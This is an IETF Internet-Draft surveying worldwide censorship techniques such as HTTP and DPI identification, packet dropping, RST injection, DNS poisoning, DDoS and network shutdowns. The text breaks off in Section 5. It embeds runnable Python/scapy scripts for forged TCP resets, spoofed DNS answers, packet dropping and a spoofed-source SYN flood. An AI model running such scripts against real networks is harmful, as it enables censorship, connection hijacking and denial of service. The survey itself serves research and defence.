NETWORK WORKING GROUP                                           J. Hall
Internet-Draft                                                      CDT
Intended status: Informational                                 M. Aaron
Expires: October 30, 2015                                    CU Boulder
                                                               B. Jones
                                                                GA Tech
                                                         April 28, 2015

             A Survey of Worldwide Censorship Techniques
                    draft-hall-censorship-tech-01

Abstract

   This document describes the technical mechanisms used by censorship
   regimes around the world to block or degrade Internet traffic.  It
   aims to make designers, implementers, and users of Internet
   protocols aware of the properties being exploited and the
   mechanisms used to censor end-user access to information.  This
   document makes no suggestions on individual protocol
   considerations; it is purely informational and intended as a
   reference.

Status of this Memo

   This Internet-Draft is submitted in full conformance with the
   provisions of BCP 78 and BCP 79.

   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF).  Note that other groups may also distribute
   working documents as Internet-Drafts.  The list of current
   Internet-Drafts is at http://datatracker.ietf.org/drafts/current/.

   Internet-Drafts are draft documents valid for a maximum of six
   months and may be updated, replaced, or obsoleted by other
   documents at any time.  It is inappropriate to use Internet-Drafts
   as reference material or to cite them other than as "work in
   progress."

   This Internet-Draft will expire on October 30, 2015.

Copyright Notice

   Copyright (c) 2015 IETF Trust and the persons identified as the
   document authors.  All rights reserved.
   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document.  Please review these documents
   carefully, as they describe your rights and restrictions with
   respect to this document.  Code Components extracted from this
   document must include Simplified BSD License text as described in
   Section 4.e of the Trust Legal Provisions and are provided without
   warranty as described in the Simplified BSD License.

Table of Contents

   1. Introduction
   2. Technical Aggregation
   3. Technical Identification
      3.1. Points of Control
      3.2. Application Layer
         3.2.1. HTTP Request Header Identification
         3.2.2. HTTP Response Header Identification
         3.2.3. Instrumenting Content Providers
         3.2.4. Deep Packet Inspection (DPI) Identification
      3.3. Transport Layer
         3.3.1. TCP/IP Header Identification
         3.3.2. Protocol Identification
   4. Technical Prevention
      4.1. Packet Dropping
      4.2. RST Packet Injection
      4.3. DNS Cache Poisoning
      4.4. Distributed Denial of Service (DDoS)
      4.5. Network Disconnection or Adversarial Route Announcement
   5. Non-Technical Aggregation
   6. Non-Technical Prevention
      6.1. Self Censorship
      6.2. Domain Name Reallocation
      6.3. Server Takedown
   7. References
   Authors' Addresses

1. Introduction

   This document describes the technical mechanisms used by censorship
   regimes around the world to block or degrade Internet traffic.  To
   that end, we describe three elements of Internet censorship:
   aggregation, identification, and prevention.  Aggregation is the
   process by which censors determine what they should block, e.g.,
   deciding to block a list of pornographic websites.  Identification
   is the process by which censors determine whether content should be
   blocked, e.g., the censor blocks all webpages containing "sex" in
   the title.  Prevention is the process by which the censor
   intercedes in communication and prevents access to censored
   materials.

2. Technical Aggregation

   Aggregation is the process of determining what a censor would like
   to block.  Generally, censors aggregate "to block" information into
   three possible sorts of blacklists: keyword, domain name, or IP
   address.  Keyword and domain name blocking take place at the
   application level (e.g., HTTP), whereas IP blocking tends to take
   place using the TCP/IP header.  The mechanisms for building up
   these blacklists are varied.
   Private companies that sell "content control" software, such as
   SmartFilter, often provide their services to nations, which can
   then pick the broad categories they would like to block, such as
   gambling or pornography [1].  In these cases, the private services
   attempt to label every semi-questionable website to allow for this
   category-based (metatag) blocking.  Countries that are more
   interested in retaining specific political control, a desire which
   requires swift and decisive action, often have ministries or
   organizations that maintain their own blacklists, such as the
   Ministry of Industry and Information Technology in China or the
   Ministry of Culture and Islamic Guidance in Iran.

3. Technical Identification

3.1. Points of Control

   Digital censorship necessarily takes place over a network.  Network
   design gives censors a number of different points of control where
   they can identify the content they are interested in filtering.
   Pervasive technical interception requires software or hardware,
   located somewhere logically or physically, to intercept the content
   the censor is interested in.  This requirement implicates four
   general points of control:

   o  Internet Backbone: If a censor controls the gateways into a
      region, it can filter undesirable traffic that is traveling into
      and out of the region by sniffing and mirroring at the relevant
      exchange points.  Censorship at this point of control is most
      effective at controlling the flow of information between a
      region and the rest of the Internet, but is ineffective at
      identifying content traveling between users within a region.

   o  Internet Service Providers: Internet Service Providers are
      perhaps the most natural point of control.  They have the
      benefit of being easily enumerable by a censor, paired with the
      ability to identify the regional and international traffic of
      all their users.  The censor's filtration mechanisms can be
      placed on an ISP via governmental mandates, ownership, or
      voluntary/coercive influence.

   o  Institutions: Private institutions such as corporations,
      schools, and cyber cafes can put filtration mechanisms in place.
      These mechanisms are occasionally at the request of a censor,
      but are more often implemented to help achieve institutional
      goals, such as preventing the viewing of pornography on school
      computers.

   o  Personal Devices: Censors can mandate that censorship software
      be installed at the device level.  This has many disadvantages
      in terms of scalability, ease of circumvention, and operating
      system requirements.  The emergence of mobile devices
      exacerbates these feasibility problems.

   At all levels of the network hierarchy, the filtration mechanisms
   used to detect undesirable traffic are essentially the same: a
   censor sniffs transmitted packets and identifies undesirable
   content, and then uses a blocking or shaping mechanism to prevent
   or degrade access.  Identification of undesirable traffic can occur
   at the application, transport, or network layer of the IP stack.
   Censors are almost always concerned with web traffic, so the
   relevant protocols tend to be filtered in predictable ways.  For
   example, a subversive image would always make it past a keyword
   filter, but the IP address of the site serving the image may be
   blacklisted when identified as a provider of undesirable content.
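   As an illustration only, the following Python sketch shows the
   generic sniff-and-identify loop described above, using the third-
   party scapy library.  The blacklist entries (drawn from the
   RFC 5737 documentation range) and the block() handler are
   hypothetical placeholders, not any particular censor's deployment.

      # Generic identification loop: sniff traffic, match it against
      # IP and keyword blacklists, and hand matches to a prevention
      # mechanism (see Section 4).
      from scapy.all import sniff, IP, Raw

      IP_BLACKLIST = {"192.0.2.10"}            # hypothetical entries
      KEYWORD_BLACKLIST = [b"forbidden-word"]  # hypothetical entries

      def block(pkt, reason):
          # Placeholder for a prevention mechanism such as Packet
          # Dropping or RST Packet Injection (Section 4).
          print("would block %s -> %s: %s"
                % (pkt[IP].src, pkt[IP].dst, reason))

      def identify(pkt):
          if IP not in pkt:
              return
          if pkt[IP].src in IP_BLACKLIST or pkt[IP].dst in IP_BLACKLIST:
              block(pkt, "blacklisted IP")
          elif Raw in pkt:
              payload = bytes(pkt[Raw]).lower()
              for kw in KEYWORD_BLACKLIST:
                  if kw in payload:
                      block(pkt, "keyword match")
                      break

      # A mirror-port deployment would read from a tap instead.
      sniff(filter="tcp", prn=identify, store=False)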
3.2. Application Layer

3.2.1. HTTP Request Header Identification

   An HTTP header contains a lot of useful information for traffic
   identification.  Although Host is the only required header field in
   an HTTP request, a method field is necessary for the request to do
   anything useful; as such, the method and Host fields are the two
   fields used most often for ubiquitous censorship.  A censor can
   sniff traffic and identify a specific domain name (Host) and
   usually a page name (GET /page) as well.  This identification
   technique is usually paired with TCP/IP header identification (see
   Section 3.3.1) for a more robust method.

   Trade-offs: Request identification is a technically
   straightforward identification method that can be easily
   implemented at the backbone or ISP level.  The hardware needed for
   this sort of identification is cheap and easy to acquire, making it
   desirable when budget and scope are a concern.  HTTPS encrypts the
   relevant request and response fields, so pairing with TCP/IP
   identification (see Section 3.3.1) is necessary for filtering
   HTTPS.

   Empirical Examples: Studies exploring censorship mechanisms have
   found evidence of HTTP header/URL filtering in many countries,
   including Bangladesh, Bahrain, China, India, Iran, Malaysia,
   Pakistan, Russia, Saudi Arabia, South Korea, Thailand, and Turkey
   [58][59][60].  Commercial technologies such as McAfee SmartFilter
   and NetSweeper are often purchased by censors [2].  These
   commercial technologies use a combination of HTTP Request
   Identification and TCP/IP Header Identification to filter specific
   URLs.  Dalek et al. and Jones et al. identified the use of these
   products in the wild [2][61].
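   As a purely illustrative sketch (the blocked-host entry is a
   hypothetical example), the following Python fragment shows the core
   of this technique: extracting the method, path, and Host field from
   a cleartext request and matching the Host against a blacklist.

      # Parse the request line and Host header of a cleartext HTTP
      # request; return (method, path, host), or None if the payload
      # does not look like an HTTP request.
      BLOCKED_HOSTS = {"forbidden.example.com"}   # hypothetical

      def identify_http_request(payload):
          head, _, _ = payload.partition(b"\r\n\r\n")
          lines = head.split(b"\r\n")
          try:
              method, path, _version = lines[0].split(b" ", 2)
          except ValueError:
              return None
          host = None
          for line in lines[1:]:
              name, _, value = line.partition(b":")
              if name.strip().lower() == b"host":
                  host = value.strip().decode("ascii", "replace")
                  break
          return method.decode(), path.decode(), host

      req = b"GET /page HTTP/1.1\r\nHost: forbidden.example.com\r\n\r\n"
      result = identify_http_request(req)
      if result and result[2] in BLOCKED_HOSTS:
          print("censor would block", *result)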
3.2.2. HTTP Response Header Identification

   While HTTP Request Header Identification relies on the information
   contained in the HTTP request from client to server, response
   identification uses information sent in response by the server to
   the client to identify undesirable content.

   Trade-offs: As with HTTP Request Header Identification, the
   techniques used to identify HTTP traffic are well-known, cheap, and
   relatively easy to implement, but they are made useless by HTTPS,
   because the response in HTTPS is encrypted, including headers.

   The response fields are also less helpful for identifying content
   than the request fields, as the server could just as easily be
   identified using HTTP Request Header Identification, and the Via
   field is rarely relevant.  HTTP response censorship mechanisms
   normally let the first n packets through while the mirrored traffic
   is being processed; this may allow some content through, and the
   user may be able to detect that the censor is actively interfering
   with undesirable content.

   Empirical Examples: In 2009, Jong Park et al. at the University of
   New Mexico demonstrated that the Great Firewall of China (GFW) used
   this technique [3].  However, Jong Park et al. found that the GFW
   discontinued this practice during the course of the study.  Due to
   the overlap between HTTP response filtering and keyword filtering
   (see Section 3.2.3), it is likely that most censors rely on keyword
   filtering over TCP streams instead of HTTP response filtering.

3.2.3. Instrumenting Content Providers

   In addition to censorship by the state, many governments pressure
   content providers to censor themselves.  Due to the extensive reach
   of government censorship, we define a content provider as any
   service that provides utility to users, including everything from
   web sites to locally installed programs.  The defining feature of
   keyword identification by content providers is that the provider
   itself detects restricted terms on its platform.  The terms to look
   for may be provided by the government, or the content provider may
   be expected to come up with its own list.

   Trade-offs: By instrumenting content providers to identify
   restricted content, the censor can gain new information at the cost
   of political capital with the companies it forces or encourages to
   participate in censorship.  For example, the censor can gain
   insight about the content of encrypted traffic by coercing web
   sites to identify restricted content, but this may drive away
   potential investment.  Coercing content providers may encourage
   self-censorship, an additional advantage for censors.  The
   trade-offs for instrumenting content providers are highly dependent
   on the content provider and the requested assistance.

   Empirical Examples: Researchers have discovered keyword
   identification by content providers on platforms ranging from
   instant messaging applications [63] to search engines
   [62][4][6][7][8].  To demonstrate the prevalence of this type of
   keyword identification, we look to search engine censorship.

   Search engine censorship demonstrates keyword identification by
   content providers and can be regional or worldwide.
   Implementation is occasionally voluntary, but normally is based on
   the laws and regulations of the country a search engine is
   operating in.  The keyword blacklists are most likely maintained by
   the search engine provider.  China requires search engine providers
   to "voluntarily" maintain search term blacklists to acquire/keep an
   Internet content provider (ICP) license [4].  It is clear these
   blacklists are maintained by each search engine provider based on
   the slight variations in the intercepted searches [5][6].  The
   United Kingdom has been pushing search engines to self-censor with
   the threat of litigation if they don't do it themselves: Google and
   Microsoft have agreed to block more than 100,000 queries in the
   U.K. to help combat abuse [7][8].

   Depending on the output, search engine keyword identification may
   be difficult or easy to detect.  In some cases specialized or blank
   results provide a trivial enumeration mechanism, but more subtle
   censorship can be difficult to detect.  In February 2014,
   Microsoft's search engine, Bing, was accused of censoring Chinese
   content outside of China [62] because Bing returned different
   results for censored terms in Chinese and English.  However, it is
   possible that censorship of the largest base of Chinese search
   users, China, biased Bing's results so that the more popular
   results in China (the uncensored results) were also more popular
   for Chinese speakers outside of China.
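   As a toy illustration of this kind of server-side keyword
   identification (the restricted term and the response shape are
   hypothetical; real lists vary per provider [5][6]), a search
   backend might gate queries as in the following Python sketch:

      # Server-side keyword identification: suppress results for
      # queries containing restricted terms.
      RESTRICTED_TERMS = {"example-banned-term"}   # hypothetical

      def search(query, backend):
          q = query.lower()
          if any(term in q for term in RESTRICTED_TERMS):
              # Providers variously return blank pages, a removal
              # notice, or silently filtered results.
              return {"results": [], "notice": "results removed"}
          return {"results": backend(query)}

      # Example: search("example-banned-term", lambda q: ["hit"])
      # returns no results, while other queries pass through.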
3.2.4. Deep Packet Inspection (DPI) Identification

   Deep Packet Inspection has become computationally feasible as a
   censorship mechanism in the past five years [9].  Unlike other
   techniques, DPI reassembles network flows to examine the
   application "data" section, as opposed to only the header, and is
   therefore often used for keyword identification.  DPI also differs
   from other identification technologies because it can leverage
   additional packet and flow characteristics, e.g., packet sizes and
   timings, to identify content.  To prevent substantial quality of
   service (QoS) impacts, DPI normally analyzes a copy of the data
   while the original packets continue to be routed.  Typically, the
   traffic is split using either a mirror switch or a fiber splitter,
   and analyzed on a cluster of machines running Intrusion Detection
   Systems (IDS) configured for censorship.

   Trade-offs: DPI is one of the most expensive identification
   mechanisms and can have a large QoS impact [10].  When used as a
   keyword filter for TCP flows, DPI systems can also cause major
   overblocking problems.  Like other techniques, DPI is less useful
   against encrypted data, though DPI can leverage unencrypted
   elements of an encrypted data flow (e.g., the Server Name
   Indication (SNI) sent in the clear for TLS) or statistical
   information about an encrypted flow (e.g., video takes more
   bandwidth than audio or textual forms of communication) to identify
   traffic.

   Despite these problems, DPI is the most powerful identification
   method and is widely used in practice.  The Great Firewall of China
   (GFW), the largest censorship system in the world, uses DPI to
   identify restricted content over HTTP and DNS and inject TCP RSTs
   and bad DNS responses, respectively, into connections [3][64][65].

   Empirical Evidence: Several studies have found evidence of DPI
   being used to censor content and tools.  Clayton et al., Crandall
   et al., Anonymous, and Khattak et al. all explored the GFW, and
   Khattak et al. even probed the firewall to discover implementation
   details such as how much state it stores [3][64][65][66].  The Tor
   Project claims that China, Iran, Ethiopia, and others must be using
   DPI to block the obfs2 protocol [11].  Malaysia has been accused of
   using targeted DPI, paired with DDoS, to identify and subsequently
   knock out pro-opposition material [12].  It also seems likely that
   organizations not so worried about blocking content in real time
   could use DPI to sort and categorically search gathered traffic
   using technologies such as NarusInsight [13].
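   One concrete DPI task mentioned above is extracting the cleartext
   SNI from a TLS ClientHello so that an encrypted flow can still be
   matched against a hostname blacklist.  The following Python sketch
   is a minimal, error-intolerant parser for that one case; a real DPI
   box would reassemble the TCP stream first and handle many more
   corner cases.

      import struct

      def extract_sni(data):
          """Return the server_name from a TLS ClientHello record,
          or None if the bytes do not look like one."""
          if len(data) < 44 or data[0] != 0x16 or data[5] != 0x01:
              return None               # not a handshake/ClientHello
          pos = 43                      # skip record header, handshake
                                        # header, version, and random
          pos += 1 + data[pos]          # session id
          (cs_len,) = struct.unpack_from("!H", data, pos)
          pos += 2 + cs_len             # cipher suites
          pos += 1 + data[pos]          # compression methods
          (ext_total,) = struct.unpack_from("!H", data, pos)
          pos += 2
          end = pos + ext_total
          while pos + 4 <= end:
              ext_type, ext_len = struct.unpack_from("!HH", data, pos)
              pos += 4
              if ext_type == 0:         # server_name extension
                  # skip list length (2 bytes) and name type (1 byte)
                  (nlen,) = struct.unpack_from("!H", data, pos + 3)
                  return data[pos + 5:pos + 5 + nlen].decode("ascii")
              pos += ext_len
          return None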
3.3. Transport Layer

3.3.1. TCP/IP Header Identification

   TCP/IP Header Identification is the most pervasive, reliable, and
   predictable type of identification.  TCP/IP headers contain a few
   invaluable pieces of information that must be transparent for
   traffic to be successfully routed: the destination and source IP
   addresses and ports.  The destination and source IPs are doubly
   useful, as they not only allow a censor to block undesirable
   content via IP blacklisting, but also allow a censor to identify
   the IP of the user making the request.  The port is useful for
   whitelisting certain applications.

   Trade-offs: TCP/IP identification is popular due to its simplicity,
   availability, and robustness.

   TCP/IP identification is trivial to implement, but it is difficult
   to implement in backbone or ISP routers at scale, and is therefore
   typically implemented with DPI.  Blacklisting an IP is equivalent
   to installing a /32 route on a router, and due to limited flow
   table space, this cannot scale beyond a few thousand IPs at most.
   IP blocking is also relatively crude, leading to overblocking, and
   cannot deal with services, like Content Distribution Networks
   (CDNs), that host content at hundreds or thousands of IP addresses.
   Despite these limitations, IP blocking is extremely effective,
   because the user needs to proxy their traffic through another
   destination to circumvent this type of identification.

   Port blocking is generally not useful, because many types of
   content share the same port and it is possible for censored
   applications to change their port.  For example, most HTTP traffic
   goes over port 80, so the censor cannot differentiate between
   restricted and allowed content solely on the basis of port.  Port
   whitelisting, where a censor limits communication to approved ports
   such as 80 for HTTP traffic, is occasionally used and is most
   effective in conjunction with other identification mechanisms.  For
   example, a censor could block the default HTTPS port, port 443,
   thereby forcing most users to fall back to HTTP.

3.3.2. Protocol Identification

   Censors sometimes identify entire protocols to be blocked using a
   variety of traffic characteristics.  For example, Iran degrades the
   performance of HTTPS traffic, a protocol that prevents further
   analysis, to encourage users to switch to HTTP, a protocol that
   they can analyze [60].  A simple protocol identification would be
   to recognize all TCP traffic over port 443 as HTTPS, but more
   sophisticated analysis of the statistical properties of payload
   data and flow behavior would be more effective, even when port 443
   is not used [14][15].

   If censors can detect circumvention tools, they can block them, so
   censors like China are extremely interested in identifying the
   protocols used by censorship circumvention tools.  In recent years,
   this has devolved into an arms race between censors and
   circumvention tool developers.  As part of this arms race, China
   developed an extremely effective protocol identification technique
   that researchers call active probing or active scanning.

   In active probing, the censor determines whether hosts are running
   a circumvention protocol by trying to initiate communication using
   the circumvention protocol.  If the host and the censor
   successfully negotiate a connection, then the censor conclusively
   knows that the host is running a circumvention tool.  China has
   used active scanning to great effect to block Tor [17].
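   A minimal sketch of the active probing step just described is shown
   below in Python.  The handshake bytes and expected reply are
   hypothetical stand-ins, not the real obfs2 or Tor handshake; the
   point is only the shape of the technique: the censor itself speaks
   the suspected protocol and blacklists hosts that answer.

      import socket

      def probe(host, port, probe_bytes, expected_prefix):
          """Return True if host answers like the suspected
          circumvention protocol."""
          try:
              with socket.create_connection((host, port),
                                            timeout=5) as s:
                  s.sendall(probe_bytes)
                  reply = s.recv(4096)
          except OSError:
              return False
          return reply.startswith(expected_prefix)

      # If probe(suspect_ip, 443, FAKE_HELLO, FAKE_REPLY) returns
      # True, the censor adds suspect_ip to its IP blacklist
      # (see Section 3.3.1).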
   Trade-offs: Protocol Identification necessarily only provides
   insight into the way information is traveling, not into the
   information itself.

   Protocol identification is useful for detecting and blocking
   circumvention tools, like Tor, or traffic that is difficult to
   analyze, like VoIP or SSL, because the censor can assume that this
   traffic should be blocked.  However, this can lead to overblocking
   problems when used with popular protocols.  These methods are
   expensive, both computationally and financially, due to the use of
   statistical analysis, and can be ineffective due to their imprecise
   nature.

   Empirical Examples: Protocol identification can be easy to detect
   if it is conducted in real time and only a particular protocol is
   blocked, but some types of protocol identification, like active
   scanning, are much more difficult to detect.  Protocol
   identification has been used by Iran to identify and throttle SSH
   traffic to make it unusable [20] and by China to identify and block
   Tor relays [17].  Protocol identification has also been used for
   traffic management, such as the 2007 case where Comcast in the
   United States used RST injection to interrupt BitTorrent traffic
   [25].

4. Technical Prevention

4.1. Packet Dropping

   Packet dropping is a simple mechanism to prevent undesirable
   traffic.  The censor identifies undesirable traffic and, instead of
   forwarding it normally, simply declines to forward any packets it
   sees associated with that traffic.  This can be paired with any of
   the previously described identification mechanisms so long as the
   censor knows the user must route traffic through a controlled
   router.

   Trade-offs: Packet Dropping is most successful when every
   traversing packet has transparent information linked to undesirable
   content, such as a destination IP.  One downside Packet Dropping
   suffers from is the necessity of overblocking all content from
   otherwise allowable IPs based on a single subversive subdomain;
   blogging services and GitHub repositories are good examples.  China
   famously dropped all GitHub packets for three days based on a
   single repository hosting undesirable content [18].  The need to
   inspect every traversing packet in close to real time also makes
   Packet Dropping somewhat challenging from a QoS perspective.

   Empirical Examples: Packet Dropping is a very common form of
   technical prevention and lends itself to accurate detection given
   the unique nature of the timeouts it leaves in its wake.  The Great
   Firewall of China uses packet dropping as one of its primary
   mechanisms of technical censorship [19].  Iran also uses Packet
   Dropping as the mechanism for throttling SSH [20].  These are but
   two examples of a ubiquitous censorship practice.
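   As an illustration of the mechanism (not any particular censor's
   implementation), the following Python sketch drops blacklisted
   flows on a Linux router using the third-party netfilterqueue
   bindings together with scapy.  It assumes packets are diverted to
   the queue with a rule such as
   "iptables -A FORWARD -j NFQUEUE --queue-num 1"; the blacklist entry
   is a hypothetical RFC 5737 example address.

      from netfilterqueue import NetfilterQueue
      from scapy.all import IP

      IP_BLACKLIST = {"192.0.2.10"}    # hypothetical

      def verdict(pkt):
          ip = IP(pkt.get_payload())
          if ip.src in IP_BLACKLIST or ip.dst in IP_BLACKLIST:
              pkt.drop()     # silently discard; no RST, no ICMP
          else:
              pkt.accept()   # forward normally

      nfq = NetfilterQueue()
      nfq.bind(1, verdict)
      nfq.run()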
4.2. RST Packet Injection

   Packet injection, generally, refers to a man-in-the-middle (MITM)
   network interference technique that spoofs packets in an
   established traffic stream.  RST packets are normally used to let
   one side of a TCP connection know the other side has stopped
   sending information, and thus the receiver should close the
   connection.  RST Packet Injection is a specific type of packet
   injection attack that is used to interrupt an established stream by
   sending RST packets to both sides of a TCP connection; as each
   receiver thinks the other has dropped the connection, the session
   is terminated.

   Trade-offs: RST Packet Injection has a few advantages that make it
   extremely popular as a censorship technique.  RST Packet Injection
   is an out-of-band prevention mechanism, allowing the censor to
   avoid the QoS bottleneck one can encounter with inline techniques
   such as Packet Dropping.  This out-of-band property allows a censor
   to inspect a copy of the information, usually mirrored by an
   optical splitter, making it an ideal pairing for DPI and Protocol
   Identification [21].  RST Packet Injection also has the advantage
   of only requiring one of the two endpoints to accept the spoofed
   packet for the connection to be interrupted [22].  The difficult
   part of RST Packet Injection is spoofing "enough" correct
   information to ensure one endpoint accepts a RST packet as
   legitimate; this generally implies a correct IP, port, and (TCP)
   sequence number.  The sequence number is the hardest to get
   correct, as RFC 793 specifies that an RST packet should be
   in-sequence to be accepted, although the RFC also recommends
   allowing in-window packets as "good enough" [23].  This in-window
   recommendation is important: if it is implemented, it allows for
   successful Blind RST Injection attacks [24].  When in-window
   sequencing is allowed, it is trivial to conduct a Blind RST
   Injection; "blind" means the censor does not know any sensitive
   (encrypted) sequencing information about the TCP stream it is
   injecting into, so it simply enumerates the roughly 70,000 possible
   windows.  This is particularly useful for interrupting
   encrypted/obfuscated protocols such as SSH or Tor.  RST Packet
   Injection relies on TCP's stateful connection semantics, making it
   useless against UDP connections.  RST Packet Injection is among the
   most popular censorship techniques used today given its versatile
   nature and effectiveness against all types of TCP traffic.

   Empirical Examples: RST Packet Injection, as mentioned above, is
   most often paired with identification techniques that require
   splitting, such as DPI or Protocol Identification.  In 2007 Comcast
   was accused of using RST Packet Injection to interrupt traffic it
   identified as BitTorrent [25]; this later led to a US Federal
   Communications Commission ruling against Comcast [26].  China has
   also been known to use RST Packet Injection for censorship
   purposes.  This prevention is especially evident in the
   interruption of encrypted/obfuscated protocols, such as those used
   by Tor [27].
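   The forging step itself is simple once a packet from the target
   flow has been observed; the following Python/scapy sketch (an
   illustration, not a reproduction of any deployed system) forges
   RSTs toward both endpoints, reusing the observed sequence and
   acknowledgment numbers so the spoofed segments land in-window as
   discussed above.

      from scapy.all import IP, TCP, send

      def inject_rst(observed):
          """Forge RSTs to both ends of the TCP connection that
          'observed' (a sniffed IP/TCP packet) belongs to."""
          ip, tcp = observed[IP], observed[TCP]
          # RST toward the receiver, spoofed as coming from the
          # sender; the sender's own sequence number is in-window.
          send(IP(src=ip.src, dst=ip.dst) /
               TCP(sport=tcp.sport, dport=tcp.dport,
                   flags="R", seq=tcp.seq), verbose=False)
          # RST toward the sender, spoofed as coming from the
          # receiver; the observed ACK is the next sequence number
          # the sender expects from the receiver.
          send(IP(src=ip.dst, dst=ip.src) /
               TCP(sport=tcp.dport, dport=tcp.sport,
                   flags="R", seq=tcp.ack), verbose=False)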
4.3. DNS Cache Poisoning

   DNS Cache Poisoning refers to a mechanism where a censor interferes
   with the response sent by a DNS resolver to the requesting device
   by injecting an alternative IP address into the response message on
   the return path.  Cache poisoning occurs after the requested site's
   name servers resolve the request and attempt to forward the IP back
   to the requesting device; on the return route, the resolved IP is
   recursively cached by each DNS server that initially forwarded the
   request.  If an undesirable keyword is recognized during this
   caching process, the resolved IP is poisoned and an alternative IP
   is returned.  These alternative IPs usually direct to a nonsense
   domain or a warning page [28].  Alternatively, Iranian censorship
   appears to prevent the communication en route, so that a response
   is never sent [29].

   Trade-offs: DNS Cache Poisoning is one of the rarer forms of
   prevention due to a number of shortcomings.  DNS Cache Poisoning
   requires the censor to force a user to traverse a controlled DNS
   resolver for the mechanism to be effective, and it is easily
   circumvented by a technically savvy user who opts to use
   alternative DNS resolvers, such as the 8.8.8.8/8.8.4.4 public DNS
   resolvers provided by Google.  DNS Cache Poisoning also implies
   returning an incorrect IP to those attempting to resolve a domain
   name, but the site is still technically unblocked if the user has
   another method to acquire the IP address of the desired site.
   Blocking overflow has also been a problem: occasionally users
   outside of the censor's region are directed through a DNS server
   controlled by a censor, causing their requests to fail.  The ease
   of circumvention, paired with the large risk of overblocking and
   blocking overflow, makes DNS Cache Poisoning a partial, difficult,
   and less than ideal censorship mechanism.

   Empirical Evidence: DNS Cache Poisoning, when properly implemented,
   is easy to identify based on the shortcomings identified above.
   Turkey relied on DNS Cache Poisoning for its country-wide block of
   websites such as Twitter and YouTube for almost a week in March
   2014, but the ease of circumvention resulted in an increase in the
   popularity of Twitter until Turkish ISPs implemented an IP
   blacklist to achieve the governmental mandate [30].  To drive the
   proverbial nail into the coffin, Turkish ISPs started hijacking all
   requests to Google's and Level 3's international DNS resolvers
   [31].  DNS Cache Poisoning, when incorrectly implemented, has
   resulted in some of the largest "censorship disasters".  In January
   2014 China started directing all requests passing through the Great
   Firewall to a single domain, dongtaiwang.com, due to an improperly
   configured DNS Cache Poisoning attempt; this incident is thought to
   be the largest Internet-service outage in history [32][33].
   Countries such as China, Iran, Turkey, and the United States have
   discussed blocking entire TLDs as well, but only Iran has acted, by
   blocking all Israeli (.il) domains [34].
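   The injection itself can be illustrated with a short Python/scapy
   sketch: race the legitimate resolver by answering a sniffed query
   for a blacklisted name with a forged response carrying an
   alternative address.  The blocked name and the redirect address (an
   RFC 5737 documentation address) are hypothetical examples.

      from scapy.all import sniff, send, IP, UDP, DNS, DNSRR

      BLOCKED = {b"forbidden.example.com."}   # hypothetical
      REDIRECT_IP = "192.0.2.1"               # e.g. a warning page

      def poison(pkt):
          if DNS in pkt and pkt[DNS].qr == 0 and pkt[DNS].qd is not None:
              qname = pkt[DNS].qd.qname
              if qname in BLOCKED:
                  # Spoof the resolver's address and mirror the
                  # query ID so the client accepts the answer.
                  forged = (IP(src=pkt[IP].dst, dst=pkt[IP].src) /
                            UDP(sport=53, dport=pkt[UDP].sport) /
                            DNS(id=pkt[DNS].id, qr=1, aa=1,
                                qd=pkt[DNS].qd,
                                an=DNSRR(rrname=qname, ttl=3600,
                                         rdata=REDIRECT_IP)))
                  send(forged, verbose=False)

      sniff(filter="udp port 53", prn=poison, store=False)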
4.4. Distributed Denial of Service (DDoS)

   Distributed Denial of Service attacks are a common attack mechanism
   used by "hacktivists" and black-hat hackers, but censors have also
   used DDoS in the past for a variety of reasons.  There is a huge
   variety of DDoS attacks [35], but at a high level two possible
   impacts tend to occur: a flood attack results in the service being
   unusable while resources are being spent to handle the flood, while
   a crash attack aims to crash the service so resources can be
   reallocated elsewhere without "releasing" the service.

   Trade-offs: DDoS is an appealing mechanism when a censor would like
   to prevent all access to undesirable content, instead of only
   access in its region, for a limited period of time, but this is
   really the only uniquely beneficial feature of DDoS as a censorship
   technique.  The resources required to carry out a successful DDoS
   against major targets are substantial, usually requiring renting or
   owning a malicious distributed platform such as a botnet, and the
   technique is imprecise.  DDoS is an incredibly crude censorship
   technique and appears to be used largely as a timely,
   easy-to-access mechanism for blocking undesirable content for a
   limited period of time.

   Empirical Examples: In 2012 the U.K.'s GCHQ used DDoS to
   temporarily shut down IRC chat rooms frequented by members of
   Anonymous using the SYN flood method; a SYN flood exploits the
   handshake used by TCP to overload the victim server with so many
   requests that legitimate traffic becomes slow or impossible
   [36][37].  Dissenting opinion websites are frequently victims of
   DDoS around politically sensitive events in Burma [38].
   Controlling parties in Russia [39], Zimbabwe [40], and Malaysia
   [41] have been accused of using DDoS to interrupt opposition
   support and access during elections.
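   For illustration, the SYN flood mechanism described in [37] reduces
   to a few lines of Python/scapy; the victim address here is a
   hypothetical RFC 5737 example.  Each SYN carries a random spoofed
   source, so the victim's SYN-ACKs go nowhere and half-open
   connection state accumulates until legitimate clients can no longer
   complete the handshake.

      from scapy.all import IP, TCP, send, RandIP, RandShort

      VICTIM = "192.0.2.80"   # hypothetical example address

      def syn_flood(count=1000):
          # Spoofed-source SYNs consume the victim's connection
          # state without ever completing the TCP handshake.
          send(IP(src=RandIP(), dst=VICTIM) /
               TCP(sport=RandShort(), dport=80, flags="S"),
               count=count, verbose=False)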
4.5. Network Disconnection or Adversarial Route Announcement

   While it is perhaps the crudest of all censorship techniques, there
   is no more effective way of making sure undesirable information
   cannot propagate on the web than by shutting off the network.  The
   network can be logically cut off in a region when a censoring body
   withdraws all of the Border Gateway Protocol (BGP) prefixes routing
   through the censor's country.

   Trade-offs: The impact of a network disconnection in a region is
   huge and absolute; the censor pays for absolute control over
   digital information with the loss of all the benefits the Internet
   brings.  This is never a long-term solution for any rational censor
   and is normally only used as a last resort in times of substantial
   unrest.

   Empirical Examples: Network disconnections tend to only happen in
   times of substantial unrest, largely due to the huge social,
   political, and economic impact such a move has.  One of the first,
   highly covered occurrences was the junta in Myanmar employing
   network disconnection to help its forces quash a rebellion in 2007
   [42].  China disconnected the network in the Xinjiang region during
   unrest in 2009 in an effort to prevent the protests from spreading
   to other regions [43].  The Arab Spring saw the most frequent use
   of network disconnection, with events in Egypt and Libya in 2011
   [44][45] and Syria in 2012 [46].

5. Non-Technical Aggregation

   As the name implies, sometimes manpower is the easiest way to
   figure out which content to block.  Manual filtering differs from
   the common tactic of building up blacklists in that it doesn't
   necessarily target a specific IP address or domain name, but
   instead removes or flags content.  Given the imprecise nature of
   automatic filtering, manually sorting through content and flagging
   dissenting websites, blogs, articles, and other media for
   filtration can be an effective technique.  This filtration can
